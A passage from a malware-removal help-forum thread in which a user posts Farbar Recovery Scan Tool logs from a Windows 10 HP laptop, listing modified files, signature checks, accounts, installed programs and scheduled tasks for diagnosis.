    2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
    2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
    2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-02 11:45 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
    2017-02-02 10:26 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
    2017-02-02 10:08 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2017-02-02 10:08 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
    2017-02-01 23:59 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
    2017-02-01 23:54 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
    2017-02-01 21:25 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
    2017-02-01 21:19 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2017-02-01 21:18 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2017-02-01 21:18 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2017-02-01 21:17 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
    2017-02-01 20:58 - 2017-01-02 16:12 - 00093053 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
    2017-02-01 19:33 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
    2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
    2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
    2017-01-31 23:03 - 2017-01-02 16:12 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330
    2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
    2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
    2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
    2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
    2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
    2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
    2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
    2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
    2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
    2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
    2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
    2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
    2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
    2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
    2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
    2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
    2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
    2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
    2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
    2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
    2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
    2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
    2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
    2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
    2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
    2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
    2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
    2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
    2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
    2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
    2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
    2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
    2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
    2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
    2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel

    ==================== Files in the root of some directories =======

    2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
    2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
    2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
    2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

    LastRegBack: 2017-01-23 10:44

    ==================== End of FRST.txt ============================



    #10
    mw201

    • Topic Starter

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (02-02-2017 12:07:24)
    Running from C:\Users\Joseph\Downloads
    Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
    Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
    Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Bitdefender Antivirus (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
    AS: Bitdefender Antispyware (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
    Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
    Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
    Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
    Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
    Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
    Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
    CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
    Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
    Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
    Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
    Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
    Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
    Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
    HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
    HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
    HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
    HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
    HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
    HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
    HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
    HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
    HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
    HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
    IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
    Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
    Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
    Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
    Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
    Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
    Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
    Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
    Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
    Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
    Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
    Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1 - Mozilla)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
    Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
    PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
    Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
    Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
    Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
    The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
    TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
    Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
    UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version:  - UserTesting.com)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
    WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
    Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
    Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
    Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
    Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
    Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
    Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
